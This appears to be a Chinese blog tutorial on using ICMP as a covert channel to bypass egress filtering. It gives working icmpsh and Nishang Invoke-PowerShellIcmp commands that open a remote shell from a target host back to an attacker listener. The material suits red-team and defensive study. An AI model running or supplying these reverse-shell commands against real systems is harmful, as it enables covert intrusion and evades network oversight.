【基础篇】————4、隐匿攻击之ICMP

隐匿攻击之ICMP

内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。

这是一种古老的技术,在有限的环境中大多数时候都使用它来接收shell,但现在随着红队交战的蔓延,它可以作为另一种方法,通过使用ICMP流量和绕过出口过滤来执行命令。

工具icmpsh可用于有效地执行此攻击。Bernardo Damele将其导入到工具sqlmap中,该工具可以使用-os-pwn开关触发。

以下命令将禁用所有ICMP回应应答,这对于工具正常工作至关重要,并将启动一个等待来自目标主机的ICMP数据包的侦听器:

sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py 192.168.100.3 192.168.100.4

icmpsh工具的GitHub存储库还包含需要在目标主机上传输和执行的二进制文件。以下命令将ICMP流量发送到主主机:

icmpsh.exe -t 192.168.100.3

shell将通过ICMP接收,并且可以通过此通道执行命令。

Daniel Compton开发了一个脚本来自动化该过程。此脚本所需的唯一输入是目标主机的IP地址。该脚本包含在GitHub上的icmpsh存储库中。

在线上还有各种其他工具,作为对像pix-c2这样的ICMP执行命令和控制的替代方案。

PowerShell

Nishang框架包含一个PowerShell模块,可以与icmpsh python脚本结合使用,以获得ICMP上的shell。在主机上,以下命令将等待任何传入的ICMP数据包。

./icmpsh_m.py 192.168.100.3 192.168.100.4

在目标主机上,PowerShellIcmp模块仅需要主机IP地址:

Import-Module .\Invoke-PowerShellIcmp.ps1
Invoke-PowerShellIcmp 192.168.100.3

将从主控主机接收连接。

参考

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值